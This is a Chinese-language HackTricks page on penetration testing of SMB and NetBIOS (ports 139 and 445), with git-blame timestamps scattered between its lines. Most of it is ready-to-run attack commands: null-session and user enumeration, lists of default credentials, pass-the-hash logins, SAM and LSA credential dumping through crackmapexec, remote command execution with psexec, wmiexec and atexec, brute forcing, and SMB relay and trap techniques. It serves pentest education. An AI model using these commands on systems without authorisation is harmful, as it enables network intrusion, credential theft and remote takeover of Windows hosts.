2024-02-05 02:56:36 +00:00
# 139,445 - SMB渗透测试
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 02:56:36 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS红队专家) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-02 22:21:01 +00:00
支持HackTricks的其他方式:
2024-02-05 02:56:36 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
2024-02-09 08:58:25 +00:00
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
2024-02-05 02:56:36 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-02-05 02:56:36 +00:00
## **端口139**
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
**_网络基本输入输出系统_( NetBIOS) **是一种软件协议, 旨在使局域网( LAN) 中的应用程序、个人电脑和台式机能够与网络硬件进行交互, 并**促进数据在网络中的传输**。在NetBIOS网络上, 通过它们的NetBIOS名称来识别和定位运行的软件应用程序, 这些名称最多可以长达16个字符, 并且通常与计算机名称不同。两个应用程序之间的NetBIOS会话是通过一个应用程序( 作为客户端) 向另一个应用程序( 作为服务器) 发出“呼叫”命令来启动的, 使用**TCP端口139**。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
2024-02-05 02:56:36 +00:00
## 端口445
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
从技术上讲, 端口139被称为“NBT over IP”, 而端口445被标识为“SMB over IP”。缩写**SMB**代表“**Server Message Blocks**”,也被现代称为**Common Internet File System (CIFS)**。作为一个应用层网络协议, SMB/CIFS主要用于实现文件、打印机、串行端口的共享访问, 并促进网络中节点之间各种形式的通信。
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
例如, 在Windows环境中, 突出显示SMB可以直接通过TCP/IP运行, 消除了对NetBIOS over TCP/IP的必要性, 通过利用端口445。相反, 在不同系统上, 观察到使用端口139, 表明SMB与NetBIOS over TCP/IP一起执行。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
2022-10-02 19:15:35 +00:00
### SMB
2024-02-09 08:58:25 +00:00
**Server Message Block (SMB)**协议以**客户端-服务器**模型运行, 旨在管理对文件、目录和其他网络资源( 如打印机和路由器) 的访问。SMB主要用于**Windows**操作系统系列, 确保向后兼容性, 使具有较新版本Microsoft操作系统的设备能够与运行较旧版本的设备无缝交互。此外, **Samba**项目提供了一个免费软件解决方案,可以在**Linux**和Unix系统上实现SMB, 从而通过SMB促进跨平台通信。
2022-10-02 19:15:35 +00:00
2024-02-09 08:58:25 +00:00
共享代表**本地文件系统的任意部分**, 可以由SMB服务器提供, 使得层次结构对客户端部分可**独立**于服务器的实际结构。**访问控制列表( ACLs) **定义**访问权限**,允许对用户权限进行**细粒度控制**,包括**`执行`**、**`读取`**和**`完全访问`**等属性。这些权限可以分配给个别用户或组,基于共享,与服务器上设置的本地权限不同。
2022-10-02 19:15:35 +00:00
2023-08-03 19:12:22 +00:00
### IPC$ 共享
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
通过匿名空会话, 可以访问IPC$共享,从而与通过命名管道公开的服务进行交互。工具`enum4linux`对此很有用。正确使用它,可以获取:
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
- 操作系统信息
- 父域的详细信息
- 本地用户和组的汇编
- 可用SMB共享的信息
- 有效的系统安全策略
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
这一功能对于网络管理员和安全专业人员评估网络上SMB( Server Message Block) 服务的安全状况至关重要。`enum4linux`提供了目标系统SMB环境的全面视图, 这对于识别潜在漏洞并确保SMB服务得到适当保护至关重要。
2024-02-05 02:56:36 +00:00
```bash
enum4linux -a target_ip
```
2024-02-09 08:58:25 +00:00
上述命令是`enum4linux`如何用于针对由`target_ip`指定的目标执行完整枚举的示例。
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
## 什么是NTLM
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
如果你不知道什么是NTLM, 或者想了解它是如何工作以及如何滥用它, 你会发现这个关于**NTLM**的页面非常有趣,其中解释了**这个协议的工作原理以及如何利用它**:
2020-07-15 15:43:14 +00:00
2022-10-04 23:49:59 +00:00
{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm ](../windows-hardening/ntlm/ )
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
## **服务器枚举**
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
### **扫描**网络以搜索主机:
2020-07-15 15:43:14 +00:00
```bash
nbtscan -r 192.168.0.1/24
```
2023-08-27 20:13:14 +00:00
### SMB 服务器版本
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
要寻找 SMB 版本的可能漏洞,重要的是要知道正在使用的版本。如果这些信息在其他使用的工具中没有显示,您可以:
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
- 使用 **MSF** 辅助模块 \_**auxiliary/scanner/smb/smb\_version**
- 或者使用以下脚本:
2020-07-15 15:43:14 +00:00
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" & & exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" & & sleep .1
```
2024-02-05 02:56:36 +00:00
### **搜索漏洞利用**
2020-07-15 15:43:14 +00:00
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
2024-02-09 08:58:25 +00:00
### **可能的** 凭证
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
| **用户名** | **常见密码** |
| -------------------- | ---------------------------------------- |
| _(空白)_ | _(空白)_ |
| guest | _(空白)_ |
2023-08-03 19:12:22 +00:00
| Administrator, admin | _(空白)_ , password, administrator, admin |
2024-02-09 08:58:25 +00:00
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
2020-07-15 15:43:14 +00:00
2023-12-26 21:49:09 +00:00
### 暴力破解
2024-02-09 08:58:25 +00:00
* [**SMB 暴力破解** ](../generic-methodologies-and-resources/brute-force.md#smb )
2023-12-26 21:49:09 +00:00
2024-02-09 08:58:25 +00:00
### SMB 环境信息
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 获取信息
2020-07-15 15:43:14 +00:00
```bash
#Dump interesting information
enum4linux -a [-u "< username > " -p "< passwd > "] < IP >
2021-06-16 12:07:22 +00:00
enum4linux-ng -A [-u "< username > " -p "< passwd > "] < IP >
2020-07-15 15:43:14 +00:00
nmap --script "safe or smb-enum-*" -p 445 < IP >
#Connect to the rpc
rpcclient -U "" -N < IP > #No creds
2020-12-22 11:59:42 +00:00
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
2022-11-26 22:36:18 +00:00
rpcclient -U "username%passwd" < IP > #With creds
2020-07-15 15:43:14 +00:00
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]< targetName or address >
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]< targetName or address >
```
2023-08-03 19:12:22 +00:00
### 枚举用户、组和已登录用户
2024-02-05 02:56:36 +00:00
这些信息应该已经从enum4linux和enum4linux-ng中收集到。
2023-08-03 19:12:22 +00:00
```bash
2022-10-04 23:49:59 +00:00
crackmapexec smb 10.10.10.10 --users [-u < username > -p < password > ]
crackmapexec smb 10.10.10.10 --groups [-u < username > -p < password > ]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u < username > -p < password > ]
2020-07-15 15:43:14 +00:00
2022-10-04 21:36:29 +00:00
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(& (objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
2020-07-15 15:43:14 +00:00
2022-10-04 21:36:29 +00:00
rpcclient -U "" -N 10.10.10.10
enumdomusers
2022-10-04 23:49:59 +00:00
enumdomgroups
2023-08-27 20:13:14 +00:00
```
### 枚举本地用户
2023-12-26 21:49:09 +00:00
2023-08-27 20:13:14 +00:00
[Impacket ](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py )
```bash
2022-10-04 23:49:59 +00:00
lookupsid.py -no-pass hostname.local
2023-08-27 20:13:14 +00:00
```
2024-02-05 02:56:36 +00:00
一句话
2023-08-27 20:13:14 +00:00
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - 枚举本地用户
```bash
2022-10-04 23:49:59 +00:00
use auxiliary/scanner/smb/smb_lookupsid
2023-12-26 21:49:09 +00:00
set rhosts hostname.local
2022-10-04 23:49:59 +00:00
run
2022-10-04 21:36:29 +00:00
```
2023-12-26 21:49:09 +00:00
### **枚举 LSARPC 和 SAMR rpcclient**
2020-07-15 15:43:14 +00:00
2022-10-04 23:18:19 +00:00
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md ](pentesting-smb/rpcclient-enumeration.md )
2022-10-04 21:36:29 +00:00
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
### 从 Linux 进行 GUI 连接
2021-02-02 09:11:43 +00:00
2024-02-05 02:56:36 +00:00
#### 在终端中:
2021-02-02 09:11:43 +00:00
`xdg-open smb://cascade.htb/`
2024-02-09 08:58:25 +00:00
#### 在文件浏览器窗口中( nautilus、thunar 等)
2021-02-02 09:11:43 +00:00
`smb://friendzone.htb/general/`
2023-12-26 21:49:09 +00:00
## 共享文件夹枚举
2022-10-04 23:49:59 +00:00
2023-12-26 21:49:09 +00:00
### 列出共享文件夹
2023-08-03 19:12:22 +00:00
2024-02-09 08:58:25 +00:00
始终建议查看是否可以访问任何内容,如果没有凭据,请尝试使用**null凭据/访客用户**。
2023-08-27 20:13:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
smbclient --no-pass -L //< IP > # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //< IP > #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
smbmap -H < IP > [-P < PORT > ] #Null user
smbmap -u "username" -p "password" -H < IP > [-P < PORT > ] #Creds
smbmap -u "username" -p "< NT > :< LM > " -H < IP > [-P < PORT > ] #Pass -the-Hash
smbmap -R -u "username" -p "password" -H < IP > [-P < PORT > ] #Recursive list
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
crackmapexec smb < IP > -u '' -p '' --shares #Null user
crackmapexec smb < IP > -u 'username' -p 'password' --shares #Guest user
crackmapexec smb < IP > -u 'username' -H '< HASH > ' --shares #Guest user
2023-08-03 19:12:22 +00:00
```
2023-12-26 21:49:09 +00:00
### **连接/列出共享文件夹**
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#Connect using smbclient
2020-07-15 15:43:14 +00:00
smbclient --no-pass //< IP > /< Folder >
2023-12-26 21:49:09 +00:00
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //< IP > #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
2020-07-15 15:43:14 +00:00
2023-12-26 21:49:09 +00:00
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H < IP > [-P < PORT > ] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H < IP > [-P < PORT > ] # Non-Recursive list
smbmap -u "username" -p "< NT > :< LM > " [-r/-R] [Folder] -H < IP > [-P < PORT > ] #Pass -the-Hash
2020-07-15 15:43:14 +00:00
```
2024-02-05 02:56:36 +00:00
### **手动枚举Windows共享并连接到它们**
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
可能您被限制显示主机机器的任何共享, 当您尝试列出它们时, 似乎没有任何共享可供连接。因此, 尝试手动连接到共享可能是值得一试的。要手动枚举共享, 您可能希望查找类似于NT\_STATUS\_ACCESS\_DENIED和NT\_STATUS\_BAD\_NETWORK\_NAME的响应, 当使用有效会话( 例如空会话或有效凭据) 时。这些可能表明共享是否存在但您无权访问, 或者共享根本不存在。
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
Windows目标的常见共享名称包括
2020-08-28 15:29:16 +00:00
* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON
2024-02-05 02:56:36 +00:00
( 来自_**网络安全评估第3版**_的常见共享名称)
2023-08-27 20:13:14 +00:00
2024-02-05 02:56:36 +00:00
您可以尝试使用以下命令连接到它们
2023-08-27 20:13:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
smbclient -U '%' -N \\\\< IP > \\< SHARE > # null session to connect to a windows share
smbclient -U '< USER > ' \\\\< IP > \\< SHARE > # authenticated session to connect to a windows share (you will be prompted for a password)
2023-08-27 20:13:14 +00:00
```
2024-02-09 08:58:25 +00:00
或者使用空会话的脚本
2020-08-28 15:29:16 +00:00
```bash
#/bin/bash
2020-08-28 16:23:05 +00:00
ip='< TARGET-IP-HERE > '
2020-08-28 15:29:16 +00:00
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
2023-08-03 19:12:22 +00:00
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
2020-08-28 15:29:16 +00:00
2023-08-03 19:12:22 +00:00
if [[ -z $output ]]; then
2023-12-26 21:49:09 +00:00
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
2023-08-03 19:12:22 +00:00
else
2023-12-26 21:49:09 +00:00
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
2023-08-03 19:12:22 +00:00
fi
2020-08-28 15:29:16 +00:00
done
```
2024-02-09 08:58:25 +00:00
例子
2023-08-27 20:13:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
2024-02-05 02:56:36 +00:00
### **从Windows枚举共享/无需第三方工具**
2023-12-26 21:49:09 +00:00
PowerShell
```powershell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "< computer name or session object > "
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
2024-02-05 02:56:36 +00:00
CMD控制台
2023-12-26 21:49:09 +00:00
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\< ip > /all
2023-08-27 20:13:14 +00:00
```
2024-02-09 08:58:25 +00:00
MMC Snap-in (图形化)
2023-12-26 21:49:09 +00:00
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
2020-07-15 15:43:14 +00:00
```
2024-02-05 02:56:36 +00:00
explorer.exe( 图形化) , 输入 `\\<ip>\` 查看可用的非隐藏共享。
2020-07-15 15:43:14 +00:00
2023-12-26 21:49:09 +00:00
### 挂载共享文件夹
2023-08-03 19:12:22 +00:00
```bash
2023-12-26 21:49:09 +00:00
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
2023-08-03 19:12:22 +00:00
```
2023-12-26 21:49:09 +00:00
### **下载文件**
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
阅读前面的部分以了解如何使用凭据/Pass-the-Hash 连接。
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#Search a file and download
sudo smbmap -R Folder -H < IP > -A < FileName > -q # Search the file in recursive mode and download it inside /usr/share/smbmap
2020-07-15 15:43:14 +00:00
```
```bash
2023-12-26 21:49:09 +00:00
#Download all
2023-11-05 15:30:34 +00:00
smbclient //< IP > /< share >
2020-09-03 15:27:18 +00:00
> mask ""
2020-09-04 19:43:20 +00:00
> recurse
> prompt
2020-07-15 15:43:14 +00:00
> mget *
2023-12-26 21:49:09 +00:00
#Download everything to current directory
2020-07-15 15:43:14 +00:00
```
2023-12-26 21:49:09 +00:00
### 域共享文件夹搜索
2020-12-22 15:40:31 +00:00
2024-02-05 02:56:36 +00:00
* [**Snaffler** ](https://github.com/SnaffCon/Snaffler )\*\*\*\*
2022-10-05 00:11:28 +00:00
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
2023-12-26 21:49:09 +00:00
* [**CrackMapExec** ](https://wiki.porchetta.industries/smb-protocol/spidering-shares ) 蜘蛛。
2023-08-03 19:12:22 +00:00
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`
2020-12-22 15:40:31 +00:00
```bash
2023-12-26 21:49:09 +00:00
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
2020-12-22 15:40:31 +00:00
```
2024-02-05 02:56:36 +00:00
特别有趣的是共享文件中的名为**`Registry.xml`**的文件,因为它们**可能包含**通过组策略配置了**自动登录**的用户的密码。或者**`web.config`**文件,因为它们包含凭据。
2022-10-05 23:14:39 +00:00
{% hint style="info" %}
2024-02-09 08:58:25 +00:00
**SYSVOL共享**可以被域中的所有经过身份验证的用户**读取**。在那里,您可能会**找到**许多不同的批处理、VBScript和PowerShell**脚本**。\
2024-02-05 02:56:36 +00:00
您应该**检查**其中的**脚本**,因为您可能会**找到**诸如**密码**之类的敏感信息。
2022-10-05 23:14:39 +00:00
{% endhint %}
2023-12-26 21:49:09 +00:00
## 读取注册表
2021-05-10 16:48:27 +00:00
2024-02-05 02:56:36 +00:00
您可以尝试使用一些发现的凭据**读取注册表**。Impacket ** `reg.py` **允许您尝试:
2022-10-04 23:49:59 +00:00
```bash
2023-08-27 20:13:14 +00:00
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
2023-12-26 21:49:09 +00:00
## 后渗透
2023-08-27 20:13:14 +00:00
2024-02-05 02:56:36 +00:00
**Samba** 服务器的默认配置通常位于 `/etc/samba/smb.conf` ,可能包含一些危险的配置:
2023-08-27 20:13:14 +00:00
2024-02-05 02:56:36 +00:00
| **设置** | **描述** |
| ------------------------- | -------------------------------------------------------------- |
| `browseable = yes` | 允许列出当前共享中可用的共享? |
| `read only = no` | 禁止创建和修改文件? |
| `writable = yes` | 允许用户创建和修改文件? |
| `guest ok = yes` | 允许无需密码连接到服务? |
| `enable privileges = yes` | 尊重分配给特定 SID 的权限? |
| `create mask = 0777` | 新创建文件必须分配的权限是什么? |
| `directory mask = 0777` | 新创建目录必须分配的权限是什么? |
2024-02-09 08:58:25 +00:00
| `logon script = script.sh` | 用户登录时需要执行的脚本是什么? |
2024-02-05 02:56:36 +00:00
| `magic script = script.sh` | 当脚本关闭时应执行哪个脚本? |
2024-02-09 08:58:25 +00:00
| `magic output = script.out` | 魔术脚本的输出应存储在哪里? |
2023-12-26 21:49:09 +00:00
2024-02-05 02:56:36 +00:00
命令 `smbstatus` 提供有关服务器和连接用户的信息。
2023-12-26 21:49:09 +00:00
2024-02-05 02:56:36 +00:00
## 使用 Kerberos 进行身份验证
2023-12-26 21:49:09 +00:00
2024-02-09 08:58:25 +00:00
您可以使用工具 **smbclient** 和 **rpcclient** 对 **kerberos** 进行身份验证:
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
2023-08-27 20:13:14 +00:00
```
2023-12-26 21:49:09 +00:00
## **执行命令**
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### **crackmapexec**
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
crackmapexec可以执行命令, 滥用任何**mmcexec, smbexec, atexec, wmiexec**中的一个,其中**wmiexec**是默认方法。您可以使用参数`--exec-method`指定要使用的选项:
2020-07-15 15:43:14 +00:00
```bash
apt-get install crackmapexec
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H < NTHASH > -x whoami #Pass -the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --rid-brute #RID brute
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -H < HASH > #Pass -The-Hash
2023-08-27 20:13:14 +00:00
```
2022-10-04 23:18:19 +00:00
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
这两个选项都会在受害者机器上创建一个新的服务(通过 SMB 使用 _\pipe\svcctl_ ),并使用它来执行某些操作(**psexec** 会将一个可执行文件上传到 ADMIN$ 共享,而 **smbexec** 将指向 **cmd.exe/powershell.exe** 并在参数中放入有效载荷 --**无文件技术-**-)。\
有关 [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md ) 和 [**smbexec** ](../windows-hardening/ntlm/smbexec.md ) 的**更多信息**。\
2024-02-05 02:56:36 +00:00
在 **kali** 上的位置为 /usr/share/doc/python3-impacket/examples/
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#If no password is provided, it will be prompted
2020-07-15 15:43:14 +00:00
./psexec.py [[domain/]username[:password]@]< targetName or address >
./psexec.py -hashes < LM:NT > administrator@10.10.10.103 #Pass -the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
2023-12-26 21:49:09 +00:00
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
2020-07-15 15:43:14 +00:00
```
2024-02-05 02:56:36 +00:00
使用**参数**`-k`,您可以针对**kerberos**进行身份验证,而不是**NTLM**
2020-07-15 15:43:14 +00:00
2022-10-04 23:18:19 +00:00
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
通过**端口135**使用DCOM执行命令shell, 而不触及磁盘或运行新服务。\
2024-01-02 22:21:01 +00:00
在**kali**中,它位于/usr/share/doc/python3-impacket/examples/
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]< targetName or address > #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass -the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
2020-07-15 15:43:14 +00:00
```
2024-02-05 02:56:36 +00:00
使用**参数**`-k`,您可以针对**kerberos**进行身份验证,而不是**NTLM**。
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
#If no password is provided, it will be prompted
2020-07-15 15:43:14 +00:00
./dcomexec.py [[domain/]username[:password]@]< targetName or address >
./dcomexec.py -hashes < LM:NT > administrator@10.10.10.103 #Pass -the-Hash
2023-12-26 21:49:09 +00:00
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
2020-07-15 15:43:14 +00:00
```
2022-10-04 23:18:19 +00:00
### [AtExec](../windows-hardening/ntlm/atexec.md)
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
通过任务计划程序执行命令(使用 SMB 上的 _\pipe\atsvc_ )。\
在 **kali** 上的路径为 /usr/share/doc/python3-impacket/examples/
2020-07-15 15:43:14 +00:00
```bash
./atexec.py [[domain/]username[:password]@]< targetName or address > "command"
./atexec.py -hashes < LM:NT > administrator@10.10.10.175 "whoami"
```
2024-02-05 02:56:36 +00:00
## Impacket 参考
2020-07-15 15:43:14 +00:00
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ ](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ )
2023-12-26 21:49:09 +00:00
## **暴力破解用户凭证**
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
**这不是推荐的做法,如果尝试次数超过最大允许次数,可能会导致账户被封锁**
2020-07-15 15:43:14 +00:00
```bash
nmap --script smb-brute -p 445 < IP >
2023-12-26 21:49:09 +00:00
ridenum.py < IP > 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
2023-08-27 20:13:14 +00:00
```
2024-02-05 02:56:36 +00:00
## SMB中继攻击
2023-08-27 20:13:14 +00:00
2024-02-09 08:58:25 +00:00
该攻击利用Responder工具在内部网络上**捕获SMB身份验证会话**,并将其**中继**到**目标机器**。如果身份验证**会话成功**,它将自动将您**转移到**一个**系统** **shell** 。
2024-02-05 02:56:36 +00:00
[**有关此攻击的更多信息,请单击此处。** ](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
## SMB-Trap
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
Windows库URLMon.dll在页面尝试通过SMB访问某些内容时会自动尝试对主机进行身份验证, 例如: `img src="\\10.10.10.10\path\image.jpg"`
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
这发生在以下功能中:
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
2020-07-15 15:43:14 +00:00
2024-02-09 08:58:25 +00:00
这些功能被一些浏览器和工具( 如Skype) 使用。
2020-07-15 15:43:14 +00:00
2024-02-05 02:56:36 +00:00
![来源: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html ](<../.gitbook/assets/image (93 ).png>)
2020-07-15 15:43:14 +00:00
